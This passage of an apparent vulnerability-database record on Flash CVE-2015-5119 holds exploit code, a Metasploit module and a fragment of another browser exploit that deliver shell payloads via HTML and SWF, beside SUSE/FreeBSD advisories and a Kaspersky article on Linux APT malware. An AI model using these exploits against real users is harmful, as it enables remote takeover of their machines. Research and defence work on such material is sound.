for (a=0; a < arrLen; a++)\r\n {\r\n g_arr[a].title = d.substring(0, d.length);\r\n }\r\n }\r\n\r\n function trigger()\r\n {\r\n var a = document.getElementsByTagName(\"script\");\r\n var b = a[0];\r\n b.onpropertychange = eXpl;\r\n var c = document.createElement('SELECT');\r\n c = b.appendChild(c);\r\n }\r\n\r\n </script>\r\n <embed src=#{rand_text_alpha(4 + rand(3))}.swf FlashVars=\"version=<%=flash_payload%>\" width=\"10\" height=\"10\">\r\n </embed>\r\n </body>\r\n </html>\r\n |\r\n\r\n return html_template, binding()\r\n end\r\n\r\nend", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/32904/"}, {"lastseen": "2016-02-04T06:01:36", "description": "Adobe Flash Player ByteArray Use After Free. CVE-2015-5119. Remote exploits for multiple platform", "published": "2015-07-08T00:00:00", "type": "exploitdb", "title": "Adobe Flash Player ByteArray Use After Free", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-5119"], "modified": "2015-07-08T00:00:00", "id": "EDB-ID:37523", "href": "https://www.exploit-db.com/exploits/37523/", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = GoodRanking\r\n\r\n include Msf::Exploit::Remote::BrowserExploitServer\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => 'Adobe Flash Player ByteArray Use After Free',\r\n 'Description' => %q{\r\n This module exploits an use after free on Adobe Flash Player. The vulnerability,\r\n discovered by Hacking Team and made public on its July 2015 data leak, was\r\n described as an Use After Free while handling ByteArray objects. This module has\r\n been tested successfully on:\r\n\r\n Windows XP, Chrome 43 and Adobe Flash 18.0.0.194,\r\n Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.194,\r\n Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194,\r\n Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.194,\r\n Linux Mint \"Rebecca\" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.468.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Unknown', # Someone from HackingTeam\r\n 'juan vazquez' # msf module\r\n ],\r\n 'References' =>\r\n [\r\n ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/unpatched-flash-player-flaws-more-pocs-found-in-hacking-team-leak/'],\r\n ['URL', 'https://twitter.com/w3bd3vil/status/618168863708962816']\r\n ],\r\n 'Payload' =>\r\n {\r\n 'DisableNops' => true\r\n },\r\n 'Platform' => ['win', 'linux'],\r\n 'Arch' => [ARCH_X86],\r\n 'BrowserRequirements' =>\r\n {\r\n :source => /script|headers/i,\r\n :arch => ARCH_X86,\r\n :os_name => lambda do |os|\r\n os =~ OperatingSystems::Match::LINUX ||\r\n os =~ OperatingSystems::Match::WINDOWS_7 ||\r\n os =~ OperatingSystems::Match::WINDOWS_81 ||\r\n os =~ OperatingSystems::Match::WINDOWS_VISTA ||\r\n os =~ OperatingSystems::Match::WINDOWS_XP\r\n end,\r\n :ua_name => lambda do |ua|\r\n case target.name\r\n when 'Windows'\r\n return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF || ua == Msf::HttpClients::CHROME\r\n when 'Linux'\r\n return true if ua == Msf::HttpClients::FF\r\n end\r\n\r\n false\r\n end,\r\n :flash => lambda do |ver|\r\n case target.name\r\n when 'Windows'\r\n # Note: Chrome might be vague about the version.\r\n # Instead of 18.0.0.203, it just says 18.0\r\n return true if ver =~ /^18\\./ && Gem::Version.new(ver) <= Gem::Version.new('18.0.0.194')\r\n when 'Linux'\r\n return true if ver =~ /^11\\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.468')\r\n end\r\n\r\n false\r\n end\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Windows',\r\n {\r\n 'Platform' => 'win'\r\n }\r\n ],\r\n [ 'Linux',\r\n {\r\n 'Platform' => 'linux'\r\n }\r\n ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => 'Jul 06 2015',\r\n 'DefaultTarget' => 0))\r\n end\r\n\r\n def exploit\r\n @swf = create_swf\r\n\r\n super\r\n end\r\n\r\n def on_request_exploit(cli, request, target_info)\r\n print_status(\"Request: #{request.uri}\")\r\n\r\n if request.uri =~ /\\.swf$/\r\n print_status('Sending SWF...')\r\n send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})\r\n return\r\n end\r\n\r\n print_status('Sending HTML...')\r\n send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})\r\n end\r\n\r\n def exploit_template(cli, target_info)\r\n swf_random = \"#{rand_text_alpha(4 + rand(3))}.swf\"\r\n target_payload = get_payload(cli, target_info)\r\n b64_payload = Rex::Text.encode_base64(target_payload)\r\n os_name = target_info[:os_name]\r\n\r\n if target.name =~ /Windows/\r\n platform_id = 'win'\r\n elsif target.name =~ /Linux/\r\n platform_id = 'linux'\r\n end\r\n\r\n html_template = %Q|<html>\r\n <body>\r\n <object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\" width=\"1\" height=\"1\" />\r\n <param name=\"movie\" value=\"<%=swf_random%>\" />\r\n <param name=\"allowScriptAccess\" value=\"always\" />\r\n <param name=\"FlashVars\" value=\"sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>\" />\r\n <param name=\"Play\" value=\"true\" />\r\n <embed type=\"application/x-shockwave-flash\" width=\"1\" height=\"1\" src=\"<%=swf_random%>\" allowScriptAccess=\"always\" FlashVars=\"sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>\" Play=\"true\"/>\r\n </object>\r\n </body>\r\n </html>\r\n |\r\n\r\n return html_template, binding()\r\n end\r\n\r\n def create_swf\r\n path = ::File.join(Msf::Config.data_directory, 'exploits', 'hacking_team', 'msf.swf')\r\n swf = ::File.open(path, 'rb') { |f| swf = f.read }\r\n\r\n swf\r\n end\r\nend", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/37523/"}], "suse": [{"lastseen": "2016-09-04T12:13:40", "bulletinFamily": "unix", "cvelist": ["CVE-2015-5119"], "description": "flash-player was updated to fix one security issue.\n\n This security issue was fixed:\n - CVE-2015-5119: Unspecified vulnerability allowing remote attackers to\n take over the system (bsc#937339).\n\n", "edition": 1, "modified": "2015-07-08T17:08:40", "published": "2015-07-08T17:08:40", "id": "OPENSUSE-SU-2015:1207-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-07/msg00015.html", "type": "suse", "title": "Security update for flash-player (critical)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:02:17", "bulletinFamily": "unix", "cvelist": ["CVE-2015-5119"], "description": "flash-player was updated to fix one security issue.\n\n This security issue was fixed:\n - CVE-2015-5119: Unspecified vulnerability allowing remote attackers to\n take over the system (bsc#937339).\n\n", "edition": 1, "modified": "2015-07-08T22:07:55", "published": "2015-07-08T22:07:55", "id": "OPENSUSE-SU-2015:1210-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-07/msg00016.html", "title": "Security update for flash-player (critical)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:05:46", "bulletinFamily": "unix", "cvelist": ["CVE-2015-3132", "CVE-2015-3127", "CVE-2015-3114", "CVE-2015-3124", "CVE-2015-3136", "CVE-2015-3118", "CVE-2015-3122", "CVE-2015-4433", "CVE-2015-3134", "CVE-2015-3117", "CVE-2015-4430", "CVE-2015-3119", "CVE-2015-3126", "CVE-2015-3123", "CVE-2015-4431", "CVE-2015-5119", "CVE-2014-0578", "CVE-2015-3116", "CVE-2015-3120", "CVE-2015-3121", "CVE-2015-3130", "CVE-2015-3115", "CVE-2015-3137", "CVE-2015-3129", "CVE-2015-5116", "CVE-2015-3135", "CVE-2015-3131", "CVE-2015-4432", "CVE-2015-5117", "CVE-2015-3128", "CVE-2015-4429", "CVE-2015-4428", "CVE-2015-3125", "CVE-2015-3133", "CVE-2015-5118"], "description": "flash-player was updated to fix 35 security issues.\n\n These security issues were fixed:\n - CVE-2015-3135, CVE-2015-4432, CVE-2015-5118: Heap buffer overflow\n vulnerabilities that could lead to code execution (bsc#937339).\n - CVE-2015-3117, CVE-2015-3123, CVE-2015-3130, CVE-2015-3133,\n CVE-2015-3134, CVE-2015-4431: Memory corruption vulnerabilities that\n could lead to code execution (bsc#937339).\n - CVE-2015-3126, CVE-2015-4429: Null pointer dereference issues\n (bsc#937339).\n - CVE-2015-3114: A security bypass vulnerability that could lead to\n information disclosure (bsc#937339).\n - CVE-2015-3119, CVE-2015-3120, CVE-2015-3121, CVE-2015-3122,\n CVE-2015-4433: Type confusion vulnerabilities that could lead to code\n execution (bsc#937339).\n - CVE-2015-3118, CVE-2015-3124, CVE-2015-5117, CVE-2015-3127,\n CVE-2015-3128, CVE-2015-3129, CVE-2015-3131, CVE-2015-3132,\n CVE-2015-3136, CVE-2015-3137, CVE-2015-4428, CVE-2015-4430,\n CVE-2015-5119: Use-after-free vulnerabilities that could lead to code\n execution (bsc#937339).\n - CVE-2014-0578, CVE-2015-3115, CVE-2015-3116, CVE-2015-3125,\n CVE-2015-5116: Vulnerabilities that could be exploited to bypass the\n same-origin-policy and lead to information disclosure (bsc#937339).\n\n", "edition": 1, "modified": "2015-07-09T11:08:12", "published": "2015-07-09T11:08:12", "id": "SUSE-SU-2015:1211-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-07/msg00017.html", "type": "suse", "title": "Security update for flash-player (critical)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:28:41", "bulletinFamily": "unix", "cvelist": ["CVE-2015-3132", "CVE-2015-3127", "CVE-2015-3114", "CVE-2015-3124", "CVE-2015-3136", "CVE-2015-3118", "CVE-2015-3122", "CVE-2015-4433", "CVE-2015-3134", "CVE-2015-3117", "CVE-2015-4430", "CVE-2015-3119", "CVE-2015-3126", "CVE-2015-3123", "CVE-2015-4431", "CVE-2015-5119", "CVE-2014-0578", "CVE-2015-3116", "CVE-2015-3120", "CVE-2015-3121", "CVE-2015-3130", "CVE-2015-3115", "CVE-2015-3137", "CVE-2015-3129", "CVE-2015-5116", "CVE-2015-3135", "CVE-2015-3131", "CVE-2015-4432", "CVE-2015-5117", "CVE-2015-3128", "CVE-2015-4429", "CVE-2015-4428", "CVE-2015-3125", "CVE-2015-3133", "CVE-2015-5118"], "description": "flash-player was updated to fix 35 security issues.\n\n These security issues were fixed:\n - CVE-2015-3135, CVE-2015-4432, CVE-2015-5118: Heap buffer overflow\n vulnerabilities that could lead to code execution (bsc#937339).\n - CVE-2015-3117, CVE-2015-3123, CVE-2015-3130, CVE-2015-3133,\n CVE-2015-3134, CVE-2015-4431: Memory corruption vulnerabilities that\n could lead to code execution (bsc#937339).\n - CVE-2015-3126, CVE-2015-4429: Null pointer dereference issues\n (bsc#937339).\n - CVE-2015-3114: A security bypass vulnerability that could lead to\n information disclosure (bsc#937339).\n - CVE-2015-3119, CVE-2015-3120, CVE-2015-3121, CVE-2015-3122,\n CVE-2015-4433: Type confusion vulnerabilities that could lead to code\n execution (bsc#937339).\n - CVE-2015-3118, CVE-2015-3124, CVE-2015-5117, CVE-2015-3127,\n CVE-2015-3128, CVE-2015-3129, CVE-2015-3131, CVE-2015-3132,\n CVE-2015-3136, CVE-2015-3137, CVE-2015-4428, CVE-2015-4430,\n CVE-2015-5119: Use-after-free vulnerabilities that could lead to code\n execution (bsc#937339).\n - CVE-2014-0578, CVE-2015-3115, CVE-2015-3116, CVE-2015-3125,\n CVE-2015-5116: Vulnerabilities that could be exploited to bypass the\n same-origin-policy and lead to information disclosure (bsc#937339).\n\n", "edition": 1, "modified": "2015-07-09T14:08:22", "published": "2015-07-09T14:08:22", "id": "SUSE-SU-2015:1214-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-07/msg00018.html", "type": "suse", "title": "Security update for flash-player (critical)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "freebsd": [{"lastseen": "2019-05-29T18:33:11", "bulletinFamily": "unix", "cvelist": ["CVE-2015-5119"], "description": "\nAdobe reports:\n\n\n\t Adobe has released security updates for Adobe Flash Player. These\n\t updates address critical vulnerabilities that could potentially\n\t allow an attacker to take control of the affected system. Adobe is\n\t aware of a report that an exploit targeting CVE-2015-5119 has been\n\t publicly published.\n\t \n\n", "edition": 4, "modified": "2015-07-07T00:00:00", "published": "2015-07-07T00:00:00", "id": "348BFA69-25A2-11E5-ADE1-0011D823EEBD", "href": "https://vuxml.freebsd.org/freebsd/348bfa69-25a2-11e5-ade1-0011d823eebd.html", "title": "Adobe Flash Player -- critical vulnerabilities", "type": "freebsd", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "securelist": [{"lastseen": "2020-09-12T21:51:55", "bulletinFamily": "blog", "cvelist": ["CVE-2015-5119"], "description": "\n\nPerhaps unsurprisingly, a lot has been written about targeted attacks on Windows systems. Windows is, due to its popularity, the platform for which we discover most APT attack tools. At the same time, there's a widely held opinion that Linux is a secure-by-default operating system that isn't susceptible to malicious code. It's certainly true that Linux hasn't faced the deluge of viruses, worms and Trojans faced by those running Windows systems over the years. However, there is certainly malware for Linux \u2013 including PHP backdoors, rootkits and exploit code. Moreover, numbers can be misleading. The strategic importance of servers running Linux makes them an attractive target for attackers of all kinds. If an attacker is able to compromise a server running Linux, they not only gain access to data stored on the server but can also target endpoints connected to it running Windows or macOS \u2013 for example, through a drive-by download. Furthermore, Linux computers are more likely to be left unprotected, so that such a compromise might well go unnoticed. When the[ Heartbleed and Shellshock vulnerabilities](<https://www.kaspersky.com/blog/how-a-linux-bug-may-affect-windows-based-infrastructure/15017/>) were first reported in 2014, two major concerns were that compromised Linux servers could become an attacker's gateway into a corporate network and could give an attacker access to sensitive corporate data.\n\nThe Global Research and Analysis Team (GReAT) at Kaspersky publishes regular summaries of advanced persistent threat (APT) activity, based on the threat intelligence research discussed in greater detail in our private APT reports. In this report, we focus on the targeting of Linux resources by APT threat actors.\n\nReaders who would like to learn more about our intelligence reports or request more information on a specific report are encouraged to contact intelreports@kaspersky.com.\n\n## Barium\n\nWe first wrote about the [Winnti APT group (aka APT41 or Barium) in 2013](<https://securelist.com/winnti-more-than-just-a-game/37029/>), when they were targeting mostly gaming companies for direct financial profit. Meanwhile, they grew their operations, developed tons of new tools and went for much more complex targets. MESSAGETAP is Linux malware used by this group to selectively intercept SMS messages from the infrastructure of telecoms operators. According to FireEye, the group[ deployed this malware on SMS gateway systems as part of its operations to infiltrate ISPs and telecoms companies in order to build a surveillance grid](<https://www.fireeye.com/blog/threat-research/2019/10/messagetap-who-is-reading-your-text-messages.html>).\n\nRecently, we discovered another suspected Barium/APT41 tool, written in the programming language Go (also known as Golang) that implements a dynamic, C2-controlled packet corruption/network attack tool for Linux machines. Although it's not 100% clear if this is a tool developed for system administration tasks or if it is also part of the APT41 toolset, the fact that the functionality it offers can also be achieved through other system management tools suggests that its purpose may not be legitimate. Also, its name on disk is rather generic and is unrelated to its functionality, again suggesting that it is potentially a covert tool used for carrying out certain types of destructive attacks. More details about this tool can be found in our private report "Suspected Barium network control tool in GO for Linux".\n\n## Cloud Snooper\n\nIn February 2020, Sophos published a report describing a set of malicious tools it attributes to a previously unknown threat actor called [Cloud Snooper](<https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/sophoslabs-cloud-snooper-report.pdf>). The centerpiece is a server-oriented Linux kernel rootkit that hooks netfilter traffic control functions in order to enable firewall-traversing covert C2 (command-and-control) communications. We analyzed and described the rootkit's userland companion backdoor, dubbed 'Snoopy', and were able to design detection and scanning methods to identify the rootkit at scale. We also discovered more samples, as well as targeted servers in Asia. We believe that this evolved toolset might have been in development since at least 2016.\n\n## Equation\n\n[We uncovered the Equation group in 2015](<https://securelist.com/?s=equation>). This is a highly sophisticated threat actor that has been engaged in multiple CNE (computer network exploitation) operations dating back to 2001, and perhaps as early as 1996. For many years this threat actor interacted or worked together with other powerful APT groups, for projects such as Stuxnet and Flame. The group has a powerful arsenal of implants. Among those we found were: 'EQUATIONLASER', 'EQUATIONDRUG', 'DOUBLEFANTASY', 'TRIPLEFANTASY', 'FANNY' and 'GRAYFISH'. The innovations of the Equation group aren't limited to the Windows platform. The group's POSIX-compliant codebase allows for parallel developments on other platforms. In 2015, we came by the early-stage DOUBLEFANTASY malware for Linux. This implant collects system information and credentials and provides generic access to an infected computer. Given the role this module plays in the infection lifecycle, it would suggest the presence of analogous later-stage, more sophisticated implants, although we weren't able to find any.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/09/09130857/sl_overview_of_atps_02.png>)\n\n## HackingTeam\n\n[HackingTeam ](<https://securelist.com/spyware-hackingteam/37064/>)was an Italian information technology company that developed and sold intrusion and so called "legal surveillance software" to governments, law enforcement agencies and businesses around the world. Unfortunately for them, they were hacked and suffered a data breach in 2015, at the hands of the activist known as Phineas Phisher. The subsequent leak of 400GB of stolen company data, including source code and customer information, allowed these tools to be acquired, adapted and used by threat actors around the world, such as DancingSalome (aka Callisto). The leaked tools included a zero-day exploit for Adobe Flash (CVE-2015-5119) as well as sophisticated platforms capable of providing remote access, keylogging, general information recording and exfiltration, and perhaps most notably, the ability to retrieve Skype audio and video frames directly from memory, bypassing stream encryption. The RCS (Remote Control System) malware (aka Galileo, Da Vinci, Korablin, Morcut and Crisis) includes multiple components, including desktop agents for Windows, macOS and perhaps unsurprisingly\u2026 Linux.\n\n## Lazarus\n\nIn late 2018, we discovered a previously unknown malicious framework that we named [MATA](<https://securelist.com/mata-multi-platform-targeted-malware-framework/97746/>) internally. This framework was used to target commercial companies in Korea, India, Germany and Poland. While we weren't able to find code overlaps with any other known actor, the Kaspersky Threat Attribution engine showed code similarities with Manuscrypt, complex malware used by Lazarus (aka Hidden Cobra). This framework, as with earlier malware developed by Lazarus, included a Windows backdoor. However, we also found a Linux variant that we believe was designed for networking devices.\n\nIn June 2020, we analyzed new macOS samples linked to Lazarus [Operation ](<https://securelist.com/operation-applejeus-sequel/95596/>)[AppleJeus](<https://securelist.com/operation-applejeus-sequel/95596/>) and TangoDaiwbo campaigns, used in financial and espionage attacks. The samples had been uploaded to VirusTotal. The uploaded files also included a Linux malware variant that included similar functionality to the macOS TangoDaiwbo malware. These samples confirm a development that we had highlighted two years earlier \u2013 that the group was actively developing non-Windows malware.\n\n## Sofacy\n\n[Sofacy](<https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/>) (aka APT28, Fancy Bear, STRONTIUM, Sednit and Tsar Team) is a highly active and prolific APT threat actor. From its high-volume zero-day deployment to its innovative, broad malware set, Sofacy is one of the top groups that we monitor. Among the tools in the group's arsenal is SPLM (also known as CHOPSTICK and XAgent), a second-stage tool used selectively against targets around the world. Over the years, Sofacy has developed modules for several platforms, including, in 2016, modules for Linux, detected as 'Fysbis'. The consistent artefacts seen over the years and across Windows, macOS, iOS and Linux suggests that the same developers, or a small core team, is modifying and maintaining the code.\n\n## The Dukes\n\nThe [Dukes is a sophisticated threat actor that was first documented by us in 2013](<https://securelist.com/the-miniduke-mystery-pdf-0-day-government-spy-assembler-0x29a-micro-backdoor/31112/>), but whose tools have been used in attacks dating back to 2008. The group is responsible for attacks against targets in Chechnya, Ukraine, Georgia, as well as western governments and NGOs, NATO and individuals \u2013 the group is thought to be behind the hack of the Democratic National Congress in 2016. The Dukes' toolset includes a comprehensive set of malware implementing similar functionality but coded in several different programming languages. The group's malware and campaigns include PinchDuke, GeminiDuke, CosmicDuke, MiniDuke, CozyDuke, OnionDuke, SeaDuke, HammerDuke and CloudDuke. At least one of these, SeaDuke, includes a Linux variant.\n\n## The Lamberts\n\nThe Lamberts is a highly sophisticated threat actor group which is known to possess a huge malware arsenal, including passive, network-driven backdoors, several generations of modular backdoors, harvesting tools and wipers for carrying out destructive attacks. We created a color scheme to distinguish the various tools and implants used against different victims around the world.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/09/09131046/sl_overview_of_atps_03.png>)\n\n**_Lamberts discovery timeline_**\n\nIn 2017, we published an[ overview of the Lamberts family](<https://securelist.com/unraveling-the-lamberts-toolkit/77990/>); and further updates (GoldLambert, SilverLambert, RedLambert, BrownLambert) are available to customers of our[ threat intelligence reports](<https://www.kaspersky.com/enterprise-security/apt-intelligence-reporting>). The focus of the various Lamberts variants is definitely Windows. Nevertheless, signatures that we created for Green Lambert for Windows also triggered on a macOS variant of Green Lambert that was functionally similar to the Windows version. In addition, we also identified samples of the SilverLambert backdoor compiled for both Windows and Linux.\n\n## Tsunami backdoor\n\nTsunami (aka Kaiten) is a UNIX backdoor used by multiple threat actors since it was first seen in the wild in 2002. The source code was made public some years ago; and there are now more than 70 variants. The source code compiles smoothly on a wide range of embedded devices; and there are versions for ARM, MIPS, Sparc and Cisco 4500/PowerPC. Tsunami remains a threat for Linux-based routers, DVRs and the increasing number of IoT (internet of things) devices. In 2016, a variant of Tsunami was used in the[ Linux Mint hack](<https://securelist.com/beware-of-backdoored-linux-mint-isos/73893/>), where an unknown threat actor compromised the Linux Mint distribution ISOs to include a backdoor. We also observed the use of the Tsunami backdoor to surgically target a number of cryptocurrency users on Linux.\n\n## Turla\n\nTurla (aka Uroboros, Venomous Bear and Waterbug) is a prolific Russian-speaking group known for its covert exfiltration tactics such as the use of[ hijacked satellite connections](<https://securelist.com/satellite-turla-apt-command-and-control-in-the-sky/72081/>),[ water-holing of government websites](<https://securelist.com/the-epic-turla-operation/65545/>), covert channel backdoors, rootkits and[ deception tactics](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07184135/Bartholomew-GuerreroSaade-VB2016.pdf>). This threat actor, like other APT groups, has made significant changes to its toolset over the years. Until 2014, every malware sample used by Turla that we had seen was designed for 32- or 64-bit versions of Windows.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/09/09131207/sl_overview_of_atps_04.jpg>)\n\nThen in December 2014, we published our report on [Penguin Turla](<https://securelist.com/the-penquin-turla-2/67962/>), a Linux component in the Turla arsenal. This is a stealth backdoor that didn't require elevated privileges, i.e. administrator or root rights. Even if someone with limited access to the system launches it, the backdoor can intercept incoming packets and run commands from the attackers on the system while maintaining stealth. It is also rather hard to uncover, so if it's installed on a compromised server, it could sit there unnoticed for a long time. Further research on Penguin Turla revealed that[ its roots stretch back to the Moonlight Maze operation in the mid-1990s](<https://securelist.com/penquins-moonlit-maze/77883/>). In May this year, researchers from Leonardo published a report about [Penguin_x64](<https://www.leonardocompany.com/documents/20142/10868623/Malware+Technical+Insight+_Turla+%E2%80%9CPenquin_x64%E2%80%9D.pdf/541d279e-a827-38b4-99e8-3c23553cd66a>), a previously undocumented variant of the Penguin Turla Linux backdoor. Based on this report, we generated network probes that detect Penquin_x64 infected hosts at scale, allowing us to discover a couple dozen infected servers in Europe and the US, as recent as July 2020. We believe that, following public documentation of GNU/Linux tools, Turla may have been repurposing Penguin to conduct operations other than traditional intelligence gathering.\n\n## Two-Sail Junk\n\nIn January 2020, a watering hole was discovered that utilized a full remote iOS exploit chain to deploy a feature-rich implant named LightSpy. The site appears to have been designed to target users in Hong Kong, based on the content of the landing page. For the time being, until we can link the campaign to a known group, we have given the name Two-Sail Junk to the threat actor behind this implant. However, while[ our public report](<https://securelist.com/ios-exploit-chain-deploys-lightspy-malware/96407/>) focused on the iOS implant, the project is broader than previously thought, supporting an Android implant, and probably supporting implants for Windows, Linux and MacOS.\n\n## WellMess\n\nIn March 2020, we began to actively track new C2 servers associated with malware commonly referred to as WellMess, indicating a potentially massive new wave of activity. This malware was[ initially documented by JPCERT in July 2018](<https://blogs.jpcert.or.jp/en/2018/07/malware-wellmes-9b78.html>) and has been sporadically active since then. There were rumors that hint at a possible connection with CozyDuke (aka APT29), along with speculation that the current activity was focused on the healthcare industry, although we were unable to verify either claim. WellMess is a Remote Access Trojan, written in .NET and Go (Golang), cross-compiled to be compatible with both Windows and Linux.\n\n## WildNeutron\n\nWe [first published about WildNeutron in 2015](<https://securelist.com/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/71275/>), together with our colleagues from Symantec, who call it Morpho or Butterfly. This group, which rose to prominence with their 2012-2013 attacks on Twitter, Microsoft, Apple and Facebook, are one of the most elusive, mysterious and dynamic we have seen. Their arsenal included many interesting and innovative tools, such as LSA backdoors or IIS plugins, coupled with both zero-day-based and physical deployment. Unsurprisingly, in several known attacks WildNeutron used a custom Linux backdoor as well.\n\n## Zebrocy\n\nZebrocy is custom malware that we have been tracking since 2015. The group using this malware started as a subset of Sofacy, but also has similarities and[ overlaps with other APT groups](<https://securelist.com/zebrocys-multilanguage-malware-salad/90680/>). The group has developed malware in several languages, including Delphi, AutoIT, .NET, C#, PowerShell and Go. Zebrocy has mainly targeted Central Asian government-related organizations, both in-country and in remote locations. The group makes extensive use of spear phishing to compromise Windows endpoints. However, its backdoors are configured to communicate directly with IP-assigned web server hosts over port 80; and[ the group seems to favor Linux for this part of its infrastructure](<https://securelist.com/a-zebrocy-go-downloader/89419/>) \u2013 specifically, Apache 2.4.10 running on Debian Linux.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/09/09131351/sl_overview_of_atps_05.png>)\n\n## Recommendations for protecting Linux systems\n\nOne of the main reasons that Linux systems go unprotected is a false sense of security from using Linux instead of the far more popular (and more targeted) Windows. Nevertheless, we hope all the aforementioned points are convincing enough for you to start securing your Linux-based machines in a serious way.\n\nThe very first recommendation is to **maintain a list of trusted sources** of your software. Think about this in the same way as the recommended approach to Android or iOS apps \u2013 only installing applications from official repositories. In the Linux world we enjoy more freedom: for example, even if you are using Ubuntu, you're not restricted only to Canonical's own repository. Any .DEB file, or even application source code from GitHub, is at your service. But please choose these sources wisely. Don't just blindly follow instructions like "Run this script from our server to install"; or "curl https://install-url | sudo bash" \u2013 which is a security nightmare.\n\nPlease also be mindful of the **secure way to get applications** from these trusted repositories. Your channels to update the apps have to be encrypted using HTTPS or SSH protocols. Besides your trust in software sources and its delivery channel, it's critical for **updates to arrive in a timely fashion**. Most modern Linux flavors are able to do this for you, but a simple cron script would help you to stay more protected and to get all the patches as soon as they are released by developers.\n\nThe next thing we would recommend is checking network-related settings. With commands like "netstat -a" you could **filter out all unnecessary opened ports** on your host. Please avoid network applications you really don't need or don't use to minimize your network footprint. Also, it would be strongly recommended to **properly set up the firewall** from your Linux distributive, to filter traffic and store the host's network activity. It's also a very good idea not to go online directly, but through NAT.\n\nTo continue with the network-related security rules, we recommend **protecting your locally stored SSH keys** (used for your network services) using passwords at least. In more "paranoid" mode you could even **store the keys on external protected storage**, like tokens from any trusted vendor. On the server side of connections, nowadays it's not that hard to **set up multi-factor authentication for SSH sessions**, like the messages to your phone or other mechanisms such as authenticator apps.\n\nSo far, our recommendations have covered software sources, application delivery channel, avoiding unnecessary network footprint and protection of encryption keys. One more idea we recommend for monitoring threats you couldn't find at the filesystem level is to **keep and analyze the network activity logs**. You could install and use an out-of-band network tap to independently monitor and analyze the network communications of your Linux systems.\n\nAs part of your threat model, you need to consider the possibility that, despite all the aforementioned measures, attackers can compromise your protection. Think about the next protection step in terms of an attacker's persistence in the system. They will probably make changes to be able to start their Trojan automatically after the system reboots. So, you need to **regularly monitor the main configuration files as well as the integrity of system binaries**, just in case of file viruses. The logs mentioned above for monitoring network communication, is fully applicable here: **the Linux auditing system collects system calls and file access records**. Additional daemons such as "osquery" can be used for the same task. . Any suspicious files, URLs, and IP addresses can be checked at [Kaspersky Threat Intelligence Portal](<https://opentip.kaspersky.com/>).\n\nPhysical security of devices is also important. It doesn't matter how much attention you pay to network and system level hardening if your laptop ends up in an attacker's hands and you haven't taken steps to protect it from this attack vector. You should consider **full disk encryption and safe boot mechanisms** for physical security. A more spy-like approach would be to place tamper-evident security tape on your most critical hardware.\n\nDedicated [solution](<https://www.kaspersky.com/enterprise-security/endpoint>) with Linux security can simplify the protection task: web threat protection detects malicious and phishing websites; network threat protection detects network attacks in incoming traffic; behavior analysis detects malicious activity, while device control allows management of connected devices and access to them.\n\nOur final recommendation relates to Docker. This is not a theoretical threat: infection of containers is a [very real issue](<https://www.zdnet.com/article/new-linux-malware-uses-dogecoin-api-to-find-c-c-server-addresses/?amp=1>). **Containerization doesn't provide security by itself**. Some containers are quite isolated from the host, but not all \u2013 **network and file system interfaces exist** in them and in most cases there are bridges between physical and containerized worlds.\n\nTherefore, you can use security solution that allows to add security into development process. [Kaspersky Hybrid Cloud Security](<https://www.kaspersky.com/enterprise-security/devops-security>) includes integration with CI/CD platforms, such as Jenkins, through a script to scan Docker images for malicious elements at different stages.\n\nTo prevent supply-chain attacks, On-Access Scanning (OAS) and On-Demand Scanning (ODS) of 